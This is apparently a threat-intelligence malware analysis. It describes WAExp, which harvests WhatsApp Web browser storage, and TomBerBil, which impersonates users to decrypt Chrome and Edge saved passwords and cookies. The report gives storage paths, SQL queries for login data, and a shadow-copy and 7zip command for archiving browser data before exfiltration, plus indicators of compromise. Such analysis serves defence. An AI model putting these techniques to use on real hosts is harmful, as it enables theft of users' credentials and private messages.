This tool is written in .NET and designed to search for and collect browser local storage files containing data from the web version of WhatsApp (web.whatsapp.com). For users of the WhatsApp web app, their browser local storage contains their profile details, chat data, the phone numbers of users they chat with and current session data. Attackers can gain access to this data by copying the browser’s local storage files.

The executable accepts the following arguments.

app.exe [check|copy|start] [remote]

Check: checks the presence of data on the host.
Copy: copies data it finds to the temporary folder.
Start: first, copies the data to the temporary folder and then, packs the data into an archive file.
Remote: the name of the remote host.

When executed with “check“, the tool begins searching for user folders. If “remote” is specified, user folders are searched along “\\[remote]\C$\users\“. If it is not specified, the malware uses the environment variable %SystemDrive% value, retrieving the name of the system drive from it. It then searches inside the Users folder on that drive. Next, the tool goes through all folders in this directory except the following default ones.

All Users Default User Default Public

After it locates the user folders, WAExp seeks out file paths for WhatsApp database files in the Chrome, Edge, and Mozilla local storages.

ForChrome, the tool opens <User>\Appdata\local\Google\ and for Edge, <User>\Appdata\local\Microsoft\Edge\. Inside these, it looks for a folder with the following name inside the subfolders.

https_web.whatsapp.com_0.indexeddb.leveldb

For Mozilla, the tool opens<User>\Appdata\roaming\ and looks for a folder with the following name inside the subfolders:

https+++web.whatsapp.com

Roaming may contain several Mozilla folders with web.whatsapp.com storage data. For example,Mozilla Thunderbird can store this data too, as it supports a WhatsApp plugin.

WAExp “check” output with results for Chrome, Edge, Firefox and Thunderbird

In the image above, you can see the output of the tool running with the “check” parameter. It shows storage files for Chrome, Edge and Firefox, as well as the Thunderbird mail client detected on the host.

When executed with the “copy” parameter, WAExp copies all whatsapp.com data storage files in the system to the following temporary storage folder.

C:\Programdata\Microsoft\Default\

The last parameter that the tool uses is “start”. It gathers target files inside a temporary folder, as described in the copy function, and packs these into an archive with the help of the System.IO.Compression.ZipFile module (T1560.002 Archive Collected Data: Archive via Library).

It saves the archive file under a name consisting of the word ‘Default’ and a timestamp, without extension, at the following path:

C:\Programdata\Microsoft\Default-yyyyMMdd-hhmmss

After that, it deletes the temporary folder, along with the web browsers’ and other clients’ folders containing web.whatsapp.com data.

The image below shows an example of WAExp output when run with the various startup parameters.

WAExp output for its various command-line parameters

The operations shown above collect Chrome data and generate an archive, whose contents are shown below.

Archive file containing data stolen by WAExp

TomBerBil for stealing passwords from browsers

In addition to the data that attackers can collect from hosts, they are also interested in obtaining access to all online services that target users have access to. For an adversary with high privileges in the system, one fairly easy way to do this is to decrypt browser data containing cookies and passwords that the user may have saved to autofill authentication forms (T1555.003 Credentials from Password Stores: Credentials from Web Browsers).

There are many open-source tools available for decrypting storage data, one of these being mimikatz. The problem for the adversary is that these are well known to security systems and will immediately raise red flags if detected in the infrastructure.

To avoid detection, attackers have created a range of tools implemented with different technologies and designed for the same purpose: to extract cookies and passwords from Chrome and Edge. Both browsers use the CryptProtectData feature from DPAPI (Data Protection Application Programming Interface) to encrypt data. It protects data with the current user’s password and a special encryption master key.

All TomBerBil variants work according to the same principle. After starting, the malware begins to enumerate all processes running in the system and search for all instances of explorer.exe. It identifies the process users and compiles a list.

Username identification function

The image above shows an example of the function that identifies users by process ID. It sends a WMI request to the Win32_Process class to receive an object whose processID property equals the given PID. It then calls the GetOwner method, which returns the user and domain name for the process.

After this, the malware searches for the encryption key, stored in the encrypted_key field in the following browser JSON files.

%LOCALAPPDATA%\Google\Chrome\User Data\Local State %LOCALAPPDATA%\Microsoft\Edge\User Data\Local State

It then impersonates the users it identified and attempts to decrypt the master key using the CryptUnprotectData function. To do this, it calls Unprotect function from the System.Security.Cryptography.ProtectedData package, which, in turn, uses CryptUnprotectData function call from Windows DPAPI.

Calling the Unprotect function

The image above shows an example of the Unprotect function call, which receives an array of bytes obtained from the encrypted_key field. The value of DataProtectionScope.CurrentUser is passed as the third parameter. This means that the user context of the calling process will be used when decrypting the data. The tool impersonates the users it finds in explorer.exe for this very purpose.

If the decryption is successful, the malware searches for Login Data and \Network\Cookies files inside the following folders.

%LOCALAPPDATA%\Google\Chrome\User Data\Default %LOCALAPPDATA%\Google\Chrome\User Data\Profile *

It copies any files it finds to the temporary folder, where it opens them as SQL database files and runs the following queries.

SELECT origin_url, username_value, password_value FROM logins SELECT cast(creation_utc as text) as creation_utc, host_key, name, path, cast(expires_utc as text) as expires_utc, cast(last_access_utc as text) as last_access_utc, encrypted_value FROM cookies

Data retrieved this way is decrypted with the master key and saved in special files.

Most versions of the malware tool log their actions. Below is an example of a log file that they generate:

[+] Begin 7/28/2023 1:12:37 PM [+] Current user SYSTEM [*] [5516] [explorer] [UserName] [+] Impersonate user UserName [+] Current user UserName [+] Local State File: C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Local State [+] MasterKeyBytes: 6j<...>k= [>] Profile: C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default [+] Copy C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default\Login Data to C:\Windows\TEMP\tmpF319.tmp [+] Delete File C:\Windows\TEMP\tmpF319.tmp [+] Copy C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies to C:\Windows\TEMP\tmpFA1F.tmp [+] Delete File C:\Windows\TEMP\tmpFA1F.tmp [+] Local State File: C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Local State [+] MasterKeyBytes: fv<...>GM= [>] Profile: C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default [+] Copy C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default\Login Data to C:\Windows\TEMP\tmpFCB0.tmp [+] Delete File C:\Windows\TEMP\tmpFCB0.tmp [+] Copy C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies to C:\Windows\TEMP\tmpFD5D.tmp [+] Delete File C:\Windows\TEMP\tmpFD5D.tmp [+] Recvtoself [+] Current user SYSTEM [+] End 7/28/2023 1:12:52 PM

One of the variants mimics Kaspersky Anti-Virus. This executable, written in .NET, is named avpui.exe (T1036.005 Masquerading: Match Legitimate Name or Location) and contains relevant metadata:

Metadata of the tool pretending to be KAV

Some versions of the tool required specific command-line parameters to start. An example can be seen below:

A TomBerBil variant started with a parameter

In several cases, beside using TomBerBil, the adversary created a shadow copy of the disk and archived the User Data file with 7zip for the further exfiltration.

wmic shadowcopy call create Volume='C:\' "cmd" /c c:\Intel\7z6.exe a c:\Intel\1.7z -mx0 -r \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Users\<username>\AppData\Local\Google\ Chrome\"User Data\"

Conclusion

We looked at several tools that allow the attackers to maintain access to target infrastructures and automatically search for and collect data of interest. The attackers are actively using techniques to bypass defenses in an attempt to mask their presence in the system.

To protect the organization’s infrastructure, we recommend adding to the firewall denylist the resources and IP addresses of cloud services that provide traffic tunneling. We also recommend limiting the range of tools administrators are allowed to use for accessing hosts remotely. Unused tools must be either forbidden or thoroughly monitored as a possible indicator of suspicious activity. In addition, users must be required to avoid storing passwords in their browsers, as it helps attackers to access sensitive information. Reusing passwords across different services poses a risk of more data becoming available to attackers.

Indicators of compromise

Files

1D2B32910B500368EF0933CDC43FDE0B WAExp 5C2870F18E64A14A64ABF9A56F5B6E6B WAExp AFEA0827779025C92CAB86F685D6429A cuthead C7D8266C63F8AECA8D5F5BDCD433E72A cuthead 750EF49AFB88DDD52F6B0C500BE9B717 TomBerBil 853A75364D76E9726474335BCD17E225 TomBerBil BA3EF3D0947031FB9FFBC2401BA82D79 Krong

legitimate tools

4A79A8B1F6978862ECFA71B55066AADD FRP client 1F514121162865A9E664C919E71A6F62 vpnserver_x64.exe 6F32D6CFAAD3A956AACEA4C5A5C4FBFE vpnserver_x64.exe 9DC7237AC63D552270C5CA27960168C3 ngrok.exe 34985FAE5FA8E9EBAA872DE8D0105005 ngrok.exe

C2 addresses

103.27.202[.]85 – SSH server 118.193.40[.]42 – Server from SoftEther VPN Ha[.]bbmouseme[.]com – Server from SoftEther VPN

Links

hxxp://www.netportal.or[.]kr/common/css/main.js vpnserver_x64.exe hxxp://www.netportal.or[.]kr/common/css/ham.js Hamcore.se2 hxxp://23.106.122[.]5/hamcore.se2 Hamcore.se2 hxxps://etracking.nso.go[.]th/UserFiles/File/111/tasklist.exe vpnserver_x64.exe hxxps://etracking.nso.go[.]th/UserFiles/File/111/hamcore.se2 Hamcore.se2